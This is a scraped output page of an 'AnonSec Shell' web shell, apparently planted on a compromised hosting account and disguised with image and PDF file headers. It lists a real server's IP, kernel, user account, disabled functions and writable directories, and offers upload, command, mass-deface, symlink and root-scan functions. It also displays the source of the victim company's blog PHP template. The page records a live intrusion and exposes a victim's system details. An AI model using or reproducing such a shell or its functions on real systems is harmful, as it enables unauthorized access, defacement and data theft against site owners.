ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 82.197.83.129  /  Your IP : 216.73.216.166   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64
User : u489457460 ( 489457460)
PHP Version : 7.3.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u489457460/domains/syoft.com/public_html/blogs/application/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/u489457460/domains/syoft.com/public_html/blogs/application/views/blog-page-copy.php
<?php
// require 'writer/utils.php';

// $current_post = getPostSlugDetail($_REQUEST["id"]);

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on')
    $url = "https://";
else
    $url = "http://";

$url .= $_SERVER['HTTP_HOST'];

$url .= $_SERVER['REQUEST_URI'];

?>
<!DOCTYPE html>
<html lang="en">

<head>
    <!--required meta tags-->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

    <!--meta-->
    <meta name="description" content="Syoft is a technology based company that thrives on improving businesses and change people’s lives. We help businesses and individuals in adapting digital transformation.">
    <meta name="author" content="">

    <!--favicon icon-->
    <link rel="icon" href="/assets/img/favicon.png" type="image/png" sizes="16x16">

    <!--title-->
    <title><?php echo $current_post["meta_title"]; ?></title>
    <meta name="description" content="<?php echo $current_post["meta_desc"]; ?>">
    <meta name="keywords" content="<?php echo $current_post["meta_keywords"]; ?>">

    <meta property="og:title" content="<?php echo $current_post["meta_title"]; ?>">
    <meta property="og:description" content="<?php echo $current_post["meta_desc"]; ?>">
    <meta property="og:keywords" content="<?php echo $current_post["meta_keywords"]; ?>">
    <meta property="og:url" content="<?php echo $url; ?>">
    <meta property="og:image" content="<?php echo $current_post["uimage"]; ?>">
    <meta property="og:image:width" content="510">
    <meta property="og:image:height" content="397">
    <meta property="twitter:card" content="summary_large_image">
    <meta property="twitter:site" content="@syoftofficial">
    <meta property="twitter:creator" content="@syoftofficial">
    <meta property="twitter:title" content="<?php echo $current_post["meta_title"]; ?>">
    <meta property="twitter:description" content="<?php echo $current_post["meta_desc"]; ?>">
    <meta property="twitter:image" content="<?php echo $current_post["uimage"]; ?>">
    <link rel="canonical" href="<?php echo $url; ?>">

    <!--google fonts-->
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700;800&family=Open+Sans:wght@400;600&display=swap" rel="stylesheet">

    <!--build:css-->
    <link rel="stylesheet" href="/assets/css/main.css">
    <!-- endbuild -->

    <!--custom css start-->
    <link rel="stylesheet" href="/assets/css/custom.css">
    <!--custom css end-->

</head>

<body>

    <!--preloader start-->
    <!--<div id="preloader">-->
    <!--    <div class="preloader-wrap">-->
    <!--        <img src="/assets/img/favicon.png" alt="logo" class="img-fluid preloader-icon" />-->
    <!--        <div class="loading-bar"></div>-->
    <!--    </div>-->
    <!--</div>-->
    <!--preloader end-->
    <!--main content wrapper start-->
    <div class="main-wrapper">

        <!--header section start-->

        <?php $this->load->view('header'); ?>


        <!--header section End-->

        <!--page header section start-->
        <section class="page-header position-relative overflow-hidden ptb-60 bg-dark" style="background: url('/assets/img/page-header-bg.svg')no-repeat bottom left">
            <div class="container">
                <div class="row align-items-center">
                    <div class="col-lg-8 col-12">
                        <?php

                        echo '<h1 class="fw-bold display-5">' . $current_post["title"] . '</h1>';
                        ?>
                    </div>
                </div>
                <div class="bg-circle rounded-circle circle-shape-3 position-absolute bg-dark-light right-5"></div>
            </div>
        </section>
        <!--page header section end-->

        <!--blog details section start-->
        <section class="blog-details ptb-60">
            <div class="container">
                <div class="row justify-content-between">
                    <div class="col-lg-8 pe-lg-5">
                        <div class="blog-details-wrap">
                            <?php echo $current_post["desc"]; ?>
                        </div>
                    </div>
                    <div class="col-lg-4">
                        <div class="author-wrap text-center bg-light p-5 sticky-sidebar rounded-custom mt-5 mt-lg-0">
                            <img src="https://syoft.com/blogs/uploads/post_images/thumbnails/<?php echo $current_post["uimage"]; ?>" alt="author" width="120" class="img-fluid shadow-sm rounded-circle" />
                            <div class="author-info my-4">
                                <h5 class="mb-0"><?php echo $current_post["uname"]; ?></h5>
                                <span class="small"><?php echo $current_post["udesignation"]; ?></span>
                            </div>
                            <p><?php echo $current_post["udesc"]; ?></p>
                            <?php

                            $actual_link = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";


                            ?>



                            <ul class="list-unstyled author-social-list list-inline mt-3 mb-0">
                                <li class="list-inline-item"><a href="https://www.facebook.com/Syoftofficial" target="_blank"><i class="fab fa-facebook-f"></i></a></li>
                                <li class="list-inline-item"><a href="https://www.instagram.com/syoftofficial/" target="_blank"><i class="fab fa-instagram"></i></a></li>
                                <li class="list-inline-item"><a href="https://twitter.com/syoftofficial" target="_blank"><i class="fab fa-twitter"></i></a></li>
                                <li class="list-inline-item"><a href="https://www.linkedin.com/company/syoft/" target="_blank"><i class="fab fa-linkedin"></i></a></li>

                                <!-- <li class="list-inline-item">
                            <a target="_blank" href="http://www.linkedin.com/shareArticle?mini=true&amp;url=<?php echo $actual_link; ?>"><i class="fab fa-facebook-f"></i></a>
                        </li>
                        <li class="list-inline-item">
                            <a target="_blank" href="https://twitter.com/share?url=<?php echo $actual_link; ?>"> <i class="fab fa-instagram"></i></a>
                        </li>
                        <li class="list-inline-item">
                            <a href="#"> <i class="fab fa-twitter"></i></a>
                        </li>
                        <li class="list-inline-item">
                            <a target="_blank" href="http://www.facebook.com/sharer.php?u=<?php echo $actual_link; ?>"> <i class="fab fa-linkedin"></i></a>
                        </li> -->
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <!--blog details section end-->

        <!--related blog start-->
        <section class="related-blog-list ptb-60 bg-light">
            <div class="container">
                <div class="row align-items-center justify-content-between">
                    <div class="col-lg-8 col-md-12">
                        <div class="section-heading">
                            <h4 class="h5 text-primary">Related News</h4>
                            <h2>More Latest News and Blog at Syoft</h2>
                        </div>
                    </div>
                    <div class="col-lg-4 col-md-12">
                        <div class="text-start text-lg-end mb-4 mb-lg-0 mb-xl-0">
                            <a href="/blogs" class="btn btn-primary">View All Article</a>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <?php
                    // $allposts = getRelatedPosts($current_post["category"]);
                    foreach ($allposts as $post) {
                        echo '<div class="col-lg-4 col-md-6">
                        <div class="single-article rounded-custom mb-4 mb-lg-0">
                            <a href="' . $post["id"] . '" class="article-img">
                                <img src="https://syoft.com/blogs/uploads/post_images/thumbnails/' . $post["featured_image"] . '" alt="article" class="img-fluid">
                            </a>
                            <div class="article-content p-4">
                                <div class="article-category mb-4 d-block">
                                    <a href="javascript:;" class="d-inline-block text-dark badge bg-warning-soft">' . $post["category"] . '</a>
                                </div>
                                <a href="' . $post["id"] . '">
                                    <h2 class="h5 article-title limit-2-line-text">' . $post["title"] . '</h2>
                                </a>
                                <p class="limit-2-line-text">' . substr($post["desc"], 0, 150) . '</p>

                                <a href="javascript:;">
                                    <div class="d-flex align-items-center pt-4">
                                        <div class="avatar">
                                            <img src="https://syoft.com/blogs/uploads/post_images/thumbnails/' . $post["uimage"] . '" alt="avatar" width="40" class="img-fluid rounded-circle me-3">
                                        </div>
                                        <div class="avatar-info">
                                        <h6 class="mb-0 avatar-name">' . $post["uname"] . '</h6>

                                            <span class="small fw-medium text-muted">' . date('F d, Y', strtotime($post["udate"])) . '</span>
                                        </div>
                                    </div>
                                </a>

                            </div>
                        </div>
                    </div>';
                    } ?>
                </div>
            </div>
        </section>
        <!-- <h6 class="mb-0 avatar-name">'.$post["uname"].'</h6> -->

        <!--related blog end-->



        <!--Common section start-->

        <?php $this->load->view('common'); ?>

        <!--Common section end-->

        <!--footer section start-->

        <?php $this->load->view('footer'); ?>

        <!--footer section end-->

    </div>


    <!--build:js-->
    <script src="assets/js/vendors/jquery-3.6.0.min.js"></script>
    <script src="assets/js/vendors/bootstrap.bundle.min.js"></script>
    <script src="assets/js/vendors/swiper-bundle.min.js"></script>
    <script src="assets/js/vendors/jquery.magnific-popup.min.js"></script>
    <script src="assets/js/vendors/parallax.min.js"></script>
    <script src="assets/js/vendors/aos.js"></script>
    <script src="assets/js/app.js"></script>
    <!--endbuild-->
</body>

</html>

Anon7 - 2022
AnonSec Team